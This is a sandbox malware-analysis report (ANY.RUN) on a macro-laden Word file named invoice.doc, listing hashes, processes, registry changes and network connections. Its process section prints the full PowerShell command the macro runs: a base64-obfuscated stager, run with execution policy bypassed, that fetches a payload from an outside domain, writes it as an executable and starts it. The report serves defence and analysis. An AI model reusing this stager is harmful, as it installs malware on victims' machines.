File name:

invoice.doc

Full analysis: https://app.any.run/tasks/9427b2eb-5493-48f8-8597-b8a457ddbfa6
Verdict: Malicious activity
Analysis date: June 21, 2025, 18:43:28
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jun 17 07:40:00 2025, Last Saved Time/Date: Tue Jun 17 12:38:00 2025, Number of Pages: 1, Number of Words: 20, Number of Characters: 115, Security: 0
MD5:

B0F5CD688B0AA84612E4EFE7FA1AB007

SHA1:

51A70205CA25341E348B6FC9FBBA45D915547C78

SHA256:

8C45E618369A137DBBAC48CFCCD3AD69CDA29F8777DEB8204850567B1FFA43B1

SSDEEP:

3072:CbadbuYWZWk/W0HCMS5aniIRupdVxwpSPB4Oov67UDEqGJAio/:CaqjXe7MSOzU+oPBg67hRA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from MS Office

      • WINWORD.EXE (PID: 3640)
    • Microsoft Office executes commands via PowerShell or Cmd

      • WINWORD.EXE (PID: 3640)
    • Starts POWERSHELL.EXE for commands execution

      • WINWORD.EXE (PID: 3640)
    • Changes powershell execution policy (Bypass)

      • WINWORD.EXE (PID: 3640)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6268)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • WINWORD.EXE (PID: 3640)
    • The process bypasses the loading of PowerShell profile settings

      • WINWORD.EXE (PID: 3640)
    • Possibly malicious use of IEX has been detected

      • WINWORD.EXE (PID: 3640)
    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 6268)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6268)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6268)
  • INFO

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6268)
    • Disables trace logs

      • powershell.exe (PID: 6268)
    • Checks proxy server information

      • powershell.exe (PID: 6268)
    • Found Base64 encoded file access via PowerShell (YARA)

      • powershell.exe (PID: 6268)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 6268)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 6268)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6268)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2025:06:17 07:40:00
ModifyDate: 2025:06:17 12:38:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 134
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 20
Characters: 115
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
144
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe conhost.exe no specs ai.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3624C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3640"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\AppData\Local\Temp\invoice.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
4168\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4520"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "62002782-5C7C-4997-9722-1C93B5A48313" "3B9A3A5A-1A68-40A6-BFE1-13A9A95C4CED" "3640"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
6268"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$a = 'JHF0bXMgPSAiYUhSMGNITTZMeTlqZVdKbGNtTm9ZV3hzWlc1biIKJGJ3bGsgPSAiWldKdlp5NTRlWG92YzNSaGRHbGpMMkZtT1RreCIKJHZueWMgPSAiT1RFM0xXUmlaR0V0TkdObFlpMWhZV05tTFdWaSIKJHJqaGYgPSAiT1RZeU1UbGpOVFExT0M1MGVIUT0iCgokbWNxcCA9ICRxdG1zICsgJGJ3bGsgKyAkdm55YyArICRyamhmCiR4a2R6ID0gW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJG1jcXApKQoKJHBheWxvYWRCYXNlNjQgPSBJbnZva2UtUmVzdE1ldGhvZCAtVXJpICR4a2R6CiRwYXlsb2FkQnl0ZXMgPSBbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBheWxvYWRCYXNlNjQpCgokdGVtcEV4ZSA9IEpvaW4tUGF0aCAkZW52OlRFTVAgInRlbXBfcGF5bG9hZC5leGUiCltJTy5GaWxlXTo6V3JpdGVBbGxCeXRlcygkdGVtcEV4ZSwgJHBheWxvYWRCeXRlcykKCiRzdGRvdXRGaWxlID0gSm9pbi1QYXRoICRlbnY6VEVNUCAic3Rkb3V0LnR4dCIKJHN0ZGVyckZpbGUgPSBKb2luLVBhdGggJGVudjpURU1QICJzdGRlcnIudHh0IgpSZW1vdmUtSXRlbSAkc3Rkb3V0RmlsZSwgJHN0ZGVyckZpbGUgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUKClN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICR0ZW1wRXhlIC1Ob05ld1dpbmRvdyBgCiAgICAtUmVkaXJlY3RTdGFuZGFyZE91dHB1dCAkc3Rkb3V0RmlsZSBgCiAgICAtUmVkaXJlY3RTdGFuZGFyZEVycm9yICRzdGRlcnJGaWxlIGAKICAgIC1XYWl0CgpXcml0ZS1Ib3N0ICItLS0gU3RhbmRhcmQgT3V0cHV0IC0tLSIKaWYgKFRlc3QtUGF0aCAkc3Rkb3V0RmlsZSkgewogICAgR2V0LUNvbnRlbnQgJHN0ZG91dEZpbGUKfQoKUmVtb3ZlLUl0ZW0gJHRlbXBFeGUsICRzdGRvdXRGaWxlLCAkc3RkZXJyRmlsZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ==';$b = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a));Invoke-Expression $b"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 844
Read events
18 502
Write events
321
Delete events
21

Modification events

(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
Operation:writeName:SessionId
Value:
4BC416DF132F7B41ABB876FA27B5C2F3
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\2200
Operation:delete valueName:0
Value:
ซ鴐㝅娴Ꝇ힬꿹�䙔�닜樁င$驄摽鶲…ީ湕湫睯쥮Ȇ∢්ł¢ᣂ숁씀褎예됏죃캲ǭ჉砃㐶ᇅᆘዒ看椀渀眀漀爀搀⸀攀砀攀씀‖ៅ肀줄࠘㈲㈱䐭捥
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\WINWORD\2200
Operation:delete keyName:(default)
Value:
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3640
Operation:writeName:0
Value:
0B0E10566EFD87EF913940B75E1366940FEE79230046BCE8F59FC6DBF8ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C50E8908C91003783634C511B81CD2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:vw&
Value:
76772600380E00000400000000000000A5319D64DCE2DB018C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:delete valueName:vw&
Value:
睶&ุ
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
Operation:writeName:RoamingConfigurableSettings
Value:
DC00000000000000803A0900E90706000600150012002B002200EF02000000000000000000000000201C0000201C00008051010080510100805101008051010080F4030080F4030080F403002C01000084030000805101000000000084030000805101000A0000001E0000001E000000000000000000000080510100010000000100000000000000000000000000000000000000008D2700008D2700008D2700010000000A000000805101000000300000003000000030000000000084030000805101001E0000008403000080510100050000000500000005000000
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\3640
Operation:writeName:0
Value:
0B0E10566EFD87EF913940B75E1366940FEE79230046BCE8F59FC6DBF8ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DA201C2190000C50E8908C91003783634C511B81CD2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:sw&
Value:
73772600380E00000200000000000000C13DB064DCE2DB01A000000001000000740000002000000063003A005C00700072006F006700720061006D002000660069006C00650073005C006D006900630072006F0073006F006600740020006F00660066006900630065005C0072006F006F0074005C006F0066006600690063006500310036005C00670065006E006B006F002E0064006C006C000000670065006E006B006F002E0063006F006E006E00650063007400310032000000
(PID) Process:(3640) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E02000000000000000600000000000000
Executable files
33
Suspicious files
118
Text files
17
Unknown types
0

Dropped files

PID
Process
Filename
Type
3640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:9DE71C36492489826C3EDB6A134BCD80
SHA256:36C233D592AFC6FBB5A0CFD5AA76B6E967B6977CE5F8743ACA722183E4C16B9C
3640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
3640WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:982DF85AE0DF238982648A496B8495B8
SHA256:AEBD6B06231842282C2DEF5294B871CCD8B72488EFC390A955E7045E92BA56C8
3640WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
3640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:96CBEDE54EB06E2246E33ABA23DDD007
SHA256:ED99D46A6E25415567269F50F88D529ACF9F27F123F2899AAC55D58B0F25DAF9
3640WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O9V4YTR999E6QZ1KZW6V.tempbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
3640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D422ED8F-AAC1-4381-8AA8-A7954358CF1Exml
MD5:D20724A86F06FB8B63C1595CC9BA6C1A
SHA256:66C97BDD4CD7186FB21EDE996D9DF65A9B774A294379C1C05CA2AC3852A17E72
3640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:9C351D73FABC710FCC6EE268E3FCD352
SHA256:7E63CDE10C3FB8F1260224DE79D70F1923D92B199FB6A35F040ED852EBBD9706
3640WINWORD.EXEC:\Users\admin\AppData\Local\Temp\cab90AB.tmpcompressed
MD5:DA3380458170E60CBEA72602FDD0D955
SHA256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
3640WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF178c61.TMPbinary
MD5:4FCB2A3EE025E4A10D21E1B154873FE2
SHA256:90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
65
DNS requests
23
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3948
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1268
svchost.exe
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3640
WINWORD.EXE
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
3640
WINWORD.EXE
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
unknown
whitelisted
3640
WINWORD.EXE
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
whitelisted
3640
WINWORD.EXE
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3640
WINWORD.EXE
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
unknown
whitelisted
3640
WINWORD.EXE
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
3640
WINWORD.EXE
GET
200
2.18.121.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4808
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3640
WINWORD.EXE
52.109.89.18:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3640
WINWORD.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
3640
WINWORD.EXE
23.48.23.62:443
omex.cdn.office.net
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3640
WINWORD.EXE
52.111.231.8:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6268
powershell.exe
34.116.159.100:443
cyberchallengebog.xyz
GOOGLE-CLOUD-PLATFORM
PL
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.142
whitelisted
officeclient.microsoft.com
  • 52.109.89.18
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
omex.cdn.office.net
  • 23.48.23.62
  • 23.48.23.18
  • 23.48.23.6
  • 23.48.23.42
  • 23.48.23.45
whitelisted
messaging.lifecycle.office.com
  • 52.111.231.8
whitelisted
cyberchallengebog.xyz
  • 34.116.159.100
unknown
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.31.130
  • 20.190.159.129
  • 20.190.159.131
  • 40.126.31.69
  • 20.190.159.128
  • 40.126.31.3
  • 40.126.31.2
  • 20.190.159.2
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.